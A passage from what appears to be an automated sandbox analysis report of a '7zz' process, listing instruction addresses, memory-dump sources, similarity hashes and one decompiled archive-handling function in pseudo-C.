                                                                      0x004291fb
                                                                      0x004291ff
                                                                      0x00429215
                                                                      0x0042921a
                                                                      0x0042921a
                                                                      0x0042921a
                                                                      0x0042921d
                                                                      0x00429221
                                                                      0x00429224
                                                                      0x00429227
                                                                      0x0042922a
                                                                      0x00429230
                                                                      0x0042923d
                                                                      0x00429240
                                                                      0x00429243
                                                                      0x00429246
                                                                      0x00429248
                                                                      0x0042924a
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00429254
                                                                      0x00429257
                                                                      0x0042925c
                                                                      0x0042925c
                                                                      0x00000000
                                                                      0x00429243
                                                                      0x004291bb
                                                                      0x004291bf
                                                                      0x004291c2
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0042917d
                                                                      0x0042917d
                                                                      0x0042917e
                                                                      0x0042918a
                                                                      0x0042918e
                                                                      0x00429192
                                                                      0x0042919d
                                                                      0x004291a1
                                                                      0x004291a6
                                                                      0x004291a9
                                                                      0x004291aa
                                                                      0x004291ac
                                                                      0x00000000
                                                                      0x004291ac
                                                                      0x0042917b
                                                                      0x00429262
                                                                      0x00429270
                                                                      0x00429272
                                                                      0x004292a9
                                                                      0x004292ae
                                                                      0x004292b0
                                                                      0x004292b4
                                                                      0x004292b7
                                                                      0x004292ba
                                                                      0x004292bd
                                                                      0x004292c0
                                                                      0x004292c6
                                                                      0x004292c9
                                                                      0x004292cb
                                                                      0x004292cf
                                                                      0x004292dc
                                                                      0x004292dc
                                                                      0x004292d1
                                                                      0x004292d8
                                                                      0x004292d8
                                                                      0x004292de
                                                                      0x004292e0
                                                                      0x004292e4
                                                                      0x004292e7
                                                                      0x004292ea
                                                                      0x004292ef
                                                                      0x004292ef
                                                                      0x004292f2
                                                                      0x004292f8
                                                                      0x004292fc
                                                                      0x00429301
                                                                      0x00429301
                                                                      0x00429303
                                                                      0x00429306
                                                                      0x0042930b
                                                                      0x00429311
                                                                      0x00429317
                                                                      0x0042931d
                                                                      0x00429320
                                                                      0x00429327
                                                                      0x00429329
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0042935b
                                                                      0x0042935e
                                                                      0x0042939d
                                                                      0x0042939f
                                                                      0x004293a2
                                                                      0x004293a5
                                                                      0x004293ab
                                                                      0x004293b1
                                                                      0x004293b4
                                                                      0x004293ba
                                                                      0x004293bd
                                                                      0x004293bf
                                                                      0x004293c3
                                                                      0x004293d0
                                                                      0x004293d0
                                                                      0x004293c5
                                                                      0x004293cc
                                                                      0x004293cc
                                                                      0x004293d2
                                                                      0x004293d4
                                                                      0x004293d7
                                                                      0x004293db
                                                                      0x004293de
                                                                      0x004293e3
                                                                      0x004293e3
                                                                      0x004293e9
                                                                      0x004293ed
                                                                      0x004293f0
                                                                      0x004293f2
                                                                      0x004293f5
                                                                      0x00429400
                                                                      0x00429400
                                                                      0x00429406
                                                                      0x0042941e
                                                                      0x00429423
                                                                      0x00429425
                                                                      0x00429427
                                                                      0x00429491
                                                                      0x00429494
                                                                      0x004294b9
                                                                      0x004294c1
                                                                      0x004294c9
                                                                      0x004294d2
                                                                      0x004294d8
                                                                      0x004294de
                                                                      0x004294e4
                                                                      0x004294ee
                                                                      0x004294f4
                                                                      0x004294f8
                                                                      0x004294fb
                                                                      0x004294fe
                                                                      0x00429502
                                                                      0x00429504
                                                                      0x00429508
                                                                      0x00429512
                                                                      0x00429512
                                                                      0x00429517
                                                                      0x00429544
                                                                      0x00429549
                                                                      0x0042954b
                                                                      0x0042954e
                                                                      0x004295ca
                                                                      0x004295d0
                                                                      0x0042965c
                                                                      0x0042965e
                                                                      0x004296b2
                                                                      0x004296b5
                                                                      0x004296bb
                                                                      0x004296be
                                                                      0x00429754
                                                                      0x004297d1
                                                                      0x004297d9
                                                                      0x004297dd
                                                                      0x00000000
                                                                      0x004297dd
                                                                      0x004296cb
                                                                      0x004296cd
                                                                      0x004296d1
                                                                      0x004296d3
                                                                      0x0042973a
                                                                      0x00429742
                                                                      0x00429746
                                                                      0x00000000
                                                                      0x00429746
                                                                      0x004296d5
                                                                      0x004296d8
                                                                      0x004296da
                                                                      0x004296df
                                                                      0x004296df
                                                                      0x004296e2
                                                                      0x004296e5
                                                                      0x004296e9
                                                                      0x004296eb
                                                                      0x004296f0
                                                                      0x004296f0
                                                                      0x004296f3
                                                                      0x004296f6
                                                                      0x004296fa
                                                                      0x004296fc
                                                                      0x00429701
                                                                      0x00429701
                                                                      0x0042970a
                                                                      0x0042970e
                                                                      0x00429716
                                                                      0x0042971a
                                                                      0x00000000
                                                                      0x0042971a
                                                                      0x00429660
                                                                      0x00429663
                                                                      0x00429667
                                                                      0x00429669
                                                                      0x0042966e
                                                                      0x0042966e
                                                                      0x00429671
                                                                      0x00429674
                                                                      0x00429678
                                                                      0x0042967a
                                                                      0x0042967f
                                                                      0x0042967f
                                                                      0x00429682
                                                                      0x00429685
                                                                      0x00429689
                                                                      0x0042968b
                                                                      0x00429690
                                                                      0x00429690
                                                                      0x00429699
                                                                      0x0042969d
                                                                      0x004296a2
                                                                      0x004296a9
                                                                      0x00000000
                                                                      0x004296a9
                                                                      0x004295e0
                                                                      0x004295e2
                                                                      0x004295e5
                                                                      0x004295e7
                                                                      0x004295eb
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004295ed
                                                                      0x004295ef
                                                                      0x004295f4
                                                                      0x004295f4
                                                                      0x004295f7
                                                                      0x004295fa
                                                                      0x004295fe
                                                                      0x00429600
                                                                      0x00429605
                                                                      0x00429605
                                                                      0x00429608
                                                                      0x0042960b
                                                                      0x0042960f
                                                                      0x00429611
                                                                      0x00429616
                                                                      0x00429616
                                                                      0x0042961f
                                                                      0x00429623
                                                                      0x00429628
                                                                      0x0042962f
                                                                      0x00000000
                                                                      0x00429550
                                                                      0x0042955a
                                                                      0x0042955c
                                                                      0x0042955f
                                                                      0x00429561
                                                                      0x00429565
                                                                      0x00429638
                                                                      0x00429638
                                                                      0x0042963a
                                                                      0x0042963f
                                                                      0x0042963f
                                                                      0x00429642
                                                                      0x00429645
                                                                      0x00429649
                                                                      0x0042964b
                                                                      0x00429654
                                                                      0x00429654
                                                                      0x0042974b
                                                                      0x0042974b
                                                                      0x004297e2
                                                                      0x004297e5
                                                                      0x004297e8
                                                                      0x004297ee
                                                                      0x004297f1
                                                                      0x004297f4
                                                                      0x004297fa
                                                                      0x00429800
                                                                      0x00429803
                                                                      0x00000000
                                                                      0x00429803
                                                                      0x0042956b
                                                                      0x0042956d
                                                                      0x00429572
                                                                      0x00429572
                                                                      0x00429575
                                                                      0x00429578
                                                                      0x0042957c
                                                                      0x0042957e
                                                                      0x00429583
                                                                      0x00429583
                                                                      0x00429586
                                                                      0x00429589
                                                                      0x0042958d
                                                                      0x0042958f
                                                                      0x00429594
                                                                      0x00429594
                                                                      0x0042959d
                                                                      0x004295a1
                                                                      0x004295a6
                                                                      0x004295ad
                                                                      0x004295b1
                                                                      0x004295b4
                                                                      0x004295bc
                                                                      0x004295c0
                                                                      0x0042971f
                                                                      0x0042971f
                                                                      0x00429722
                                                                      0x00429726
                                                                      0x00429728
                                                                      0x00429728
                                                                      0x0042972d
                                                                      0x0042972d
                                                                      0x00429730
                                                                      0x00000000
                                                                      0x00429730
                                                                      0x0042954e
                                                                      0x00429496
                                                                      0x00429499
                                                                      0x0042949d
                                                                      0x0042949f
                                                                      0x004294a8
                                                                      0x004294a8
                                                                      0x00000000
                                                                      0x00429429
                                                                      0x00429429
                                                                      0x0042942c
                                                                      0x00429430
                                                                      0x00429432
                                                                      0x00429437
                                                                      0x00429437
                                                                      0x0042943a
                                                                      0x0042943d
                                                                      0x00429441
                                                                      0x00429443
                                                                      0x00429448
                                                                      0x00429448
                                                                      0x00429451
                                                                      0x00429455
                                                                      0x0042945a
                                                                      0x00429464
                                                                      0x00429468
                                                                      0x00429470
                                                                      0x00429474
                                                                      0x00429479
                                                                      0x0042947c
                                                                      0x00429480
                                                                      0x00429482
                                                                      0x00429487
                                                                      0x00429487
                                                                      0x0042948a
                                                                      0x00000000
                                                                      0x0042948a
                                                                      0x00429427
                                                                      0x00429363
                                                                      0x00429367
                                                                      0x00429372
                                                                      0x00429376
                                                                      0x0042937e
                                                                      0x00429382
                                                                      0x00429387
                                                                      0x00429387
                                                                      0x00429387
                                                                      0x0042938e
                                                                      0x00000000
                                                                      0x0042938e
                                                                      0x0042932b
                                                                      0x0042932e
                                                                      0x00429332
                                                                      0x00429334
                                                                      0x00429339
                                                                      0x00429339
                                                                      0x00429342
                                                                      0x00429346
                                                                      0x0042934b
                                                                      0x00429352
                                                                      0x0042927f
                                                                      0x00429282
                                                                      0x0042928a
                                                                      0x0042928e
                                                                      0x00429293
                                                                      0x00429296
                                                                      0x0042929a
                                                                      0x00000000
                                                                      0x0042929a
                                                                      0x00429274
                                                                      0x0042927b
                                                                      0x00000000
                                                                      0x00429122
                                                                      0x00429122
                                                                      0x00429125
                                                                      0x0042912b
                                                                      0x00429134
                                                                      0x00429134
                                                                      0x00429393
                                                                      0x00429393
                                                                      0x00429815
                                                                      0x0042981a
                                                                      0x00429823
                                                                      0x00429823

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID:
                                                                      • API String ID: 3519838083-0
                                                                      • Opcode ID: e4c0a2cf1be0fd270f4cf5adca7858e0440031e4be77d2fa08e84f06a2b8deb6
                                                                      • Instruction ID: 547796bb05142e1515dbc63510b15c43ea8da4dd30ba33bee99df57db7602c14
                                                                      • Opcode Fuzzy Hash: e4c0a2cf1be0fd270f4cf5adca7858e0440031e4be77d2fa08e84f06a2b8deb6
                                                                      • Instruction Fuzzy Hash: 84428E70A00259EFDB10DFA8D584BDDBBB4BF19304F54409EE849A7382CB78AE45CB65
                                                                      Uniqueness

                                                                      Uniqueness Score: -1.00%

                                                                      Function 00418554 Relevance: 1.9, APIs: 1, Instructions: 374COMMON
                                                                      Download Yara Rule
                                                                      C-Code - Quality: 89%
                                                                      			E00418554(intOrPtr __ecx) {
				intOrPtr _t181;
				signed int _t184;
				signed int* _t187;
				intOrPtr _t188;
				signed int* _t191;
				signed int* _t193;
				void* _t194;
				signed int* _t195;
				void* _t197;
				signed int* _t198;
				void* _t200;
				signed int* _t201;
				intOrPtr _t205;
				signed int* _t207;
				signed int* _t208;
				signed int* _t209;
				intOrPtr* _t213;
				intOrPtr* _t215;
				intOrPtr _t216;
				intOrPtr* _t217;
				intOrPtr* _t220;
				signed int* _t222;
				signed int* _t223;
				signed int* _t224;
				intOrPtr* _t232;
				signed int* _t234;
				signed int* _t235;
				signed int* _t236;
				intOrPtr* _t243;
				signed int* _t245;
				signed int* _t246;
				signed int* _t247;
				intOrPtr _t255;
				signed int _t266;
				signed int _t307;
				signed int _t313;
				intOrPtr _t317;
				signed int** _t319;
				intOrPtr _t320;
				void* _t322;

				E0046B890(E00474E2F, _t322);
				_push(_t313);
				 *((intOrPtr*)(_t322 - 0x20)) = __ecx;
				E00418540(__ecx);
				if( *((intOrPtr*)( *((intOrPtr*)(_t322 + 0xc)) + 8)) < 0x20) {
					while(1) {
						_t317 =  *((intOrPtr*)(_t322 + 0xc));
						_t307 = 1;
						_t313 = _t313 | 0xffffffff;
						_t181 =  *((intOrPtr*)(_t317 + 8));
						 *(_t322 - 0x24) = _t313;
						if(_t181 < _t307) {
							goto L6;
						}
						L4:
						_t266 =  *( *((intOrPtr*)(_t322 - 0x20)) + 8);
						if(_t266 >= _t181) {
							L76:
							 *((char*)( *((intOrPtr*)(_t322 - 0x20)) + 0x30)) = _t266 & 0xffffff00 |  *( *((intOrPtr*)(_t322 - 0x20)) + 8) != 0x00000000;
							_t184 = 0;
							goto L77;
						}
						 *(_t322 - 0x24) =  *( *((intOrPtr*)(_t317 + 0xc)) + (_t181 - _t266) * 4 - 4);
						L7:
						if(_t266 != 0) {
							 *(_t322 - 0x38) = 0;
							 *((short*)(_t322 - 0x36)) = 0;
							_t319 =  *( *((intOrPtr*)( *((intOrPtr*)(_t322 - 0x20)) + 0xc)) + _t266 * 4 - 4);
							_t187 =  *_t319;
							 *(_t322 - 4) = _t307;
							_t188 =  *((intOrPtr*)( *_t187 + 0x20))(_t187, _t307, _t322 - 0x38);
							if(_t188 != 0) {
								L35:
								 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
								_t320 = _t188;
								E0040C20F(_t322 - 0x38);
								L71:
								_t184 = _t320;
								goto L77;
							}
							if( *(_t322 - 0x38) != 0x13) {
								L75:
								 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
								_t266 = _t322 - 0x38;
								E0040C20F(_t266);
								goto L76;
							}
							_t191 =  *_t319;
							_t313 =  *(_t322 - 0x30);
							_t188 =  *((intOrPtr*)( *_t191 + 0x14))(_t191, _t322 - 0x3c);
							if(_t188 != 0) {
								goto L35;
							}
							if(_t313 >=  *((intOrPtr*)(_t322 - 0x3c))) {
								goto L75;
							}
							 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
							E0040C20F(_t322 - 0x38);
							 *(_t322 - 0x10) = 0;
							_t193 =  *_t319;
							_t266 =  *_t193;
							 *(_t322 - 4) = 2;
							_t194 =  *_t266(_t193, 0x47a5e8, _t322 - 0x10);
							_t195 =  *(_t322 - 0x10);
							if(_t194 != 0 || _t195 == 0) {
								 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
								goto L52;
							} else {
								 *(_t322 - 0x14) = 0;
								_t266 =  *_t195;
								 *(_t322 - 4) = 3;
								_t197 =  *((intOrPtr*)(_t266 + 0xc))(_t195, _t313, _t322 - 0x14);
								_t198 =  *(_t322 - 0x14);
								if(_t197 != 0 || _t198 == 0) {
									 *(_t322 - 4) = 2;
									goto L49;
								} else {
									 *(_t322 - 0x18) = 0;
									_t266 =  *_t198;
									 *(_t322 - 4) = 4;
									_t200 =  *_t266(_t198, 0x47a638, _t322 - 0x18);
									_t201 =  *(_t322 - 0x18);
									if(_t200 != 0 || _t201 == 0) {
										 *(_t322 - 4) = 3;
										goto L46;
									} else {
										E004189B9(_t322 - 0x78);
										_push(_t322 - 0x74);
										_push(_t313);
										 *(_t322 - 4) = 5;
										_t205 = E004179F7(_t319);
										 *((intOrPtr*)(_t322 - 0x28)) = _t205;
										if(_t205 != 0) {
											 *(_t322 - 4) = 4;
											E004039FA(_t322 - 0x78);
											_t207 =  *(_t322 - 0x18);
											 *(_t322 - 4) = 3;
											if(_t207 != 0) {
												 *((intOrPtr*)( *_t207 + 8))(_t207);
											}
											_t208 =  *(_t322 - 0x14);
											 *(_t322 - 4) = 2;
											if(_t208 != 0) {
												 *((intOrPtr*)( *_t208 + 8))(_t208);
											}
											_t209 =  *(_t322 - 0x10);
											 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
											if(_t209 != 0) {
												 *((intOrPtr*)( *_t209 + 8))(_t209);
											}
											_t184 =  *((intOrPtr*)(_t322 - 0x28));
											goto L77;
										}
										 *((intOrPtr*)(_t322 - 0x1c)) = 0;
										_t213 =  *((intOrPtr*)(_t322 + 0x1c));
										 *(_t322 - 4) = 6;
										 *((intOrPtr*)( *_t213))(_t213, 0x47a5d8, _t322 - 0x1c);
										_t215 =  *((intOrPtr*)(_t322 - 0x1c));
										if(_t215 != 0) {
											 *((intOrPtr*)( *_t215 + 0xc))(_t215,  *((intOrPtr*)(_t322 - 0x74)));
										}
										 *(_t322 - 0x58) = _t313;
										_t216 = E00417BAE(_t322 - 0x78,  *((intOrPtr*)(_t322 + 8)),  *(_t322 - 0x24),  *(_t322 - 0x18), 0,  *((intOrPtr*)(_t322 + 0x1c)));
										 *((intOrPtr*)(_t322 - 0x28)) = _t216;
										if(_t216 == 1) {
											_t217 =  *((intOrPtr*)(_t322 - 0x1c));
											 *(_t322 - 4) = 5;
											if(_t217 != 0) {
												 *((intOrPtr*)( *_t217 + 8))(_t217);
											}
											_t266 = _t322 - 0x78;
											 *(_t322 - 4) = 4;
											E004039FA(_t266);
											_t201 =  *(_t322 - 0x18);
											 *(_t322 - 4) = 3;
											L46:
											if(_t201 != 0) {
												_t266 =  *_t201;
												 *((intOrPtr*)(_t266 + 8))(_t201);
											}
											_t198 =  *(_t322 - 0x14);
											 *(_t322 - 4) = 2;
											L49:
											if(_t198 != 0) {
												_t266 =  *_t198;
												 *((intOrPtr*)(_t266 + 8))(_t198);
											}
											 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
											_t195 =  *(_t322 - 0x10);
											L52:
											if(_t195 != 0) {
												_t266 =  *_t195;
												 *((intOrPtr*)(_t266 + 8))(_t195);
											}
											goto L76;
										} else {
											if(_t216 != 0) {
												_t220 =  *((intOrPtr*)(_t322 - 0x1c));
												 *(_t322 - 4) = 5;
												if(_t220 != 0) {
													 *((intOrPtr*)( *_t220 + 8))(_t220);
												}
												 *(_t322 - 4) = 4;
												E004039FA(_t322 - 0x78);
												_t222 =  *(_t322 - 0x18);
												 *(_t322 - 4) = 3;
												if(_t222 != 0) {
													 *((intOrPtr*)( *_t222 + 8))(_t222);
												}
												_t223 =  *(_t322 - 0x14);
												 *(_t322 - 4) = 2;
												if(_t223 != 0) {
													 *((intOrPtr*)( *_t223 + 8))(_t223);
												}
												_t224 =  *(_t322 - 0x10);
												 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
												if(_t224 != 0) {
													 *((intOrPtr*)( *_t224 + 8))(_t224);
												}
												_t184 =  *((intOrPtr*)(_t322 - 0x28));
												goto L77;
											}
											_t320 = E00417B16(_t319, _t313, _t322 - 0x54, _t322 - 0x4c);
											if(_t320 != 0) {
												_t232 =  *((intOrPtr*)(_t322 - 0x1c));
												 *(_t322 - 4) = 5;
												if(_t232 != 0) {
													 *((intOrPtr*)( *_t232 + 8))(_t232);
												}
												 *(_t322 - 4) = 4;
												E004039FA(_t322 - 0x78);
												_t234 =  *(_t322 - 0x18);
												 *(_t322 - 4) = 3;
												if(_t234 != 0) {
													 *((intOrPtr*)( *_t234 + 8))(_t234);
												}
												_t235 =  *(_t322 - 0x14);
												 *(_t322 - 4) = 2;
												if(_t235 != 0) {
													 *((intOrPtr*)( *_t235 + 8))(_t235);
												}
												_t236 =  *(_t322 - 0x10);
												 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
												if(_t236 != 0) {
													 *((intOrPtr*)( *_t236 + 8))(_t236);
												}
												goto L71;
											}
											_push(_t322 - 0x78);
											E00418F34( *((intOrPtr*)(_t322 - 0x20)));
											_t243 =  *((intOrPtr*)(_t322 - 0x1c));
											 *(_t322 - 4) = 5;
											if(_t243 != 0) {
												 *((intOrPtr*)( *_t243 + 8))(_t243);
											}
											 *(_t322 - 4) = 4;
											E004039FA(_t322 - 0x78);
											_t245 =  *(_t322 - 0x18);
											 *(_t322 - 4) = 3;
											if(_t245 != 0) {
												 *((intOrPtr*)( *_t245 + 8))(_t245);
											}
											_t246 =  *(_t322 - 0x14);
											 *(_t322 - 4) = 2;
											if(_t246 != 0) {
												 *((intOrPtr*)( *_t246 + 8))(_t246);
											}
											_t247 =  *(_t322 - 0x10);
											 *(_t322 - 4) =  *(_t322 - 4) | 0xffffffff;
											if(_t247 != 0) {
												 *((intOrPtr*)( *_t247 + 8))(_t247);
											}
											while(1) {
												_t317 =  *((intOrPtr*)(_t322 + 0xc));
												_t307 = 1;
												_t313 = _t313 | 0xffffffff;
												_t181 =  *((intOrPtr*)(_t317 + 8));
												 *(_t322 - 0x24) = _t313;
												if(_t181 < _t307) {
													goto L6;
												}
												goto L4;
											}
										}
									}
								}
							}
						}
						E004189B9(_t322 - 0xb4);
						 *(_t322 - 4) = 0;
						E00401E26(_t322 - 0xb0,  *((intOrPtr*)(_t322 + 0x18)));
						 *(_t322 - 0x94) = _t313;
						_t255 = E004183FD(_t322 - 0xb4,  *((intOrPtr*)(_t322 + 8)),  *(_t322 - 0x24),  *((intOrPtr*)(_t322 + 0x10)),  *((intOrPtr*)(_t322 + 0x14)),  *((intOrPtr*)(_t322 + 0x1c))); // executed
						_t320 = _t255;
						if(_t320 != 0) {
							 *(_t322 - 4) = _t313;
							E004039FA(_t322 - 0xb4);
							goto L71;
						}
						_push(_t322 - 0xb4);
						E00418F34( *((intOrPtr*)(_t322 - 0x20)));
						 *(_t322 - 4) = _t313;
						E004039FA(_t322 - 0xb4);
						continue;
						L6:
						_t266 =  *( *((intOrPtr*)(_t322 - 0x20)) + 8);
						if(_t266 >= 0x20) {
							goto L76;
						}
						goto L7;
					}
				} else {
					_t184 = 0x80004001;
					L77:
					 *[fs:0x0] =  *((intOrPtr*)(_t322 - 0xc));
					return _t184;
				}
			}











































                                                                      0x00418559
                                                                      0x00418566
                                                                      0x00418567
                                                                      0x0041856a
                                                                      0x00418578
                                                                      0x00418586
                                                                      0x00418586
                                                                      0x0041858b
                                                                      0x0041858c
                                                                      0x0041858f
                                                                      0x00418592
                                                                      0x00418597
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00418599
                                                                      0x0041859c
                                                                      0x004185a1
                                                                      0x0041899a
                                                                      0x004189a3
                                                                      0x004189a6
                                                                      0x00000000
                                                                      0x004189a6
                                                                      0x004185b0
                                                                      0x004185c4
                                                                      0x004185c6
                                                                      0x00418633
                                                                      0x00418637
                                                                      0x0041863e
                                                                      0x00418642
                                                                      0x0041864c
                                                                      0x0041864f
                                                                      0x00418654
                                                                      0x00418814
                                                                      0x00418814
                                                                      0x0041881b
                                                                      0x0041881d
                                                                      0x0041896f
                                                                      0x0041896f
                                                                      0x00000000
                                                                      0x0041896f
                                                                      0x0041865f
                                                                      0x0041898e
                                                                      0x0041898e
                                                                      0x00418992
                                                                      0x00418995
                                                                      0x00000000
                                                                      0x00418995
                                                                      0x00418665
                                                                      0x00418667
                                                                      0x00418671
                                                                      0x00418676
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x0041867f
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00418685
                                                                      0x0041868c
                                                                      0x00418691
                                                                      0x00418694
                                                                      0x0041869f
                                                                      0x004186a2
                                                                      0x004186a9
                                                                      0x004186ad
                                                                      0x004186b0
                                                                      0x00418985
                                                                      0x00000000
                                                                      0x004186be
                                                                      0x004186be
                                                                      0x004186c1
                                                                      0x004186c9
                                                                      0x004186cd
                                                                      0x004186d2
                                                                      0x004186d5
                                                                      0x0041897c
                                                                      0x00000000
                                                                      0x004186e3
                                                                      0x004186e3
                                                                      0x004186e6
                                                                      0x004186f2
                                                                      0x004186f6
                                                                      0x004186fa
                                                                      0x004186fd
                                                                      0x00418973
                                                                      0x00000000
                                                                      0x0041870b
                                                                      0x0041870e
                                                                      0x00418718
                                                                      0x00418719
                                                                      0x0041871a
                                                                      0x0041871e
                                                                      0x00418725
                                                                      0x00418728
                                                                      0x0041882a
                                                                      0x0041882e
                                                                      0x00418833
                                                                      0x00418836
                                                                      0x0041883c
                                                                      0x00418841
                                                                      0x00418841
                                                                      0x00418844
                                                                      0x00418847
                                                                      0x0041884d
                                                                      0x00418852
                                                                      0x00418852
                                                                      0x00418855
                                                                      0x00418858
                                                                      0x0041885e
                                                                      0x00418863
                                                                      0x00418863
                                                                      0x00418866
                                                                      0x00000000
                                                                      0x00418866
                                                                      0x0041872e
                                                                      0x00418731
                                                                      0x00418740
                                                                      0x00418744
                                                                      0x00418746
                                                                      0x0041874b
                                                                      0x00418753
                                                                      0x00418753
                                                                      0x0041875c
                                                                      0x00418769
                                                                      0x00418771
                                                                      0x00418774
                                                                      0x0041886e
                                                                      0x00418871
                                                                      0x00418877
                                                                      0x0041887c
                                                                      0x0041887c
                                                                      0x0041887f
                                                                      0x00418882
                                                                      0x00418886
                                                                      0x0041888b
                                                                      0x0041888e
                                                                      0x00418892
                                                                      0x00418894
                                                                      0x00418896
                                                                      0x00418899
                                                                      0x00418899
                                                                      0x0041889c
                                                                      0x0041889f
                                                                      0x004188a3
                                                                      0x004188a5
                                                                      0x004188a7
                                                                      0x004188aa
                                                                      0x004188aa
                                                                      0x004188ad
                                                                      0x004188b1
                                                                      0x004188b4
                                                                      0x004188b6
                                                                      0x004188bc
                                                                      0x004188bf
                                                                      0x004188bf
                                                                      0x00000000
                                                                      0x0041877a
                                                                      0x0041877c
                                                                      0x004188c7
                                                                      0x004188ca
                                                                      0x004188d0
                                                                      0x004188d5
                                                                      0x004188d5
                                                                      0x004188db
                                                                      0x004188df
                                                                      0x004188e4
                                                                      0x004188e7
                                                                      0x004188ed
                                                                      0x004188f2
                                                                      0x004188f2
                                                                      0x004188f5
                                                                      0x004188f8
                                                                      0x004188fe
                                                                      0x00418903
                                                                      0x00418903
                                                                      0x00418906
                                                                      0x00418909
                                                                      0x0041890f
                                                                      0x00418914
                                                                      0x00418914
                                                                      0x00418917
                                                                      0x00000000
                                                                      0x00418917
                                                                      0x00418792
                                                                      0x00418796
                                                                      0x0041891f
                                                                      0x00418922
                                                                      0x00418928
                                                                      0x0041892d
                                                                      0x0041892d
                                                                      0x00418933
                                                                      0x00418937
                                                                      0x0041893c
                                                                      0x0041893f
                                                                      0x00418945
                                                                      0x0041894a
                                                                      0x0041894a
                                                                      0x0041894d
                                                                      0x00418950
                                                                      0x00418956
                                                                      0x0041895b
                                                                      0x0041895b
                                                                      0x0041895e
                                                                      0x00418961
                                                                      0x00418967
                                                                      0x0041896c
                                                                      0x0041896c
                                                                      0x00000000
                                                                      0x00418967
                                                                      0x004187a2
                                                                      0x004187a3
                                                                      0x004187a8
                                                                      0x004187ab
                                                                      0x004187b1
                                                                      0x004187b6
                                                                      0x004187b6
                                                                      0x004187bc
                                                                      0x004187c0
                                                                      0x004187c5
                                                                      0x004187c8
                                                                      0x004187ce
                                                                      0x004187d3
                                                                      0x004187d3
                                                                      0x004187d6
                                                                      0x004187d9
                                                                      0x004187df
                                                                      0x004187e4
                                                                      0x004187e4
                                                                      0x004187e7
                                                                      0x004187ea
                                                                      0x004187f0
                                                                      0x004187f9
                                                                      0x004187f9
                                                                      0x00418586
                                                                      0x00418586
                                                                      0x0041858b
                                                                      0x0041858c
                                                                      0x0041858f
                                                                      0x00418592
                                                                      0x00418597
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00418597
                                                                      0x00418586
                                                                      0x00418774
                                                                      0x004186fd
                                                                      0x004186d5
                                                                      0x004186b0
                                                                      0x004185ce
                                                                      0x004185dc
                                                                      0x004185df
                                                                      0x004185ed
                                                                      0x004185ff
                                                                      0x00418604
                                                                      0x00418608
                                                                      0x00418807
                                                                      0x0041880a
                                                                      0x00000000
                                                                      0x0041880a
                                                                      0x00418617
                                                                      0x00418618
                                                                      0x00418623
                                                                      0x00418626
                                                                      0x00000000
                                                                      0x004185b5
                                                                      0x004185b8
                                                                      0x004185be
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x00000000
                                                                      0x004185be
                                                                      0x0041857a
                                                                      0x0041857a
                                                                      0x004189a8
                                                                      0x004189ae
                                                                      0x004189b6
                                                                      0x004189b6

                                                                      APIs
                                                                      Memory Dump Source
                                                                      • Source File: 0000000F.00000002.496130109.0000000000401000.00000020.00000001.01000000.00000007.sdmp, Offset: 00400000, based on PE: true
                                                                      • Associated: 0000000F.00000002.496104392.0000000000400000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496236300.000000000047A000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496253361.000000000048A000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496275911.000000000048B000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496281171.000000000048C000.00000008.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496286175.000000000048D000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496295745.0000000000490000.00000004.00000001.01000000.00000007.sdmpDownload File
                                                                      • Associated: 0000000F.00000002.496304475.0000000000499000.00000002.00000001.01000000.00000007.sdmpDownload File
                                                                      Joe Sandbox IDA Plugin
                                                                      • Snapshot File: hcaresult_15_2_400000_7zz.jbxd
                                                                      Similarity
                                                                      • API ID: H_prolog
                                                                      • String ID:
                                                                      • API String ID: 3519838083-0
                                                                      • Opcode ID: 9050f88662f4097002547820e55f795195db55768dbf18950763ce4779865bc7
                                                                      • Instruction ID: 76bd23d462c274ce260ddb573aa15372642f75ed32e5dbe225ef9e2e1f132d85
                                                                      • Opcode Fuzzy Hash: 9050f88662f4097002547820e55f795195db55768dbf18950763ce4779865bc7
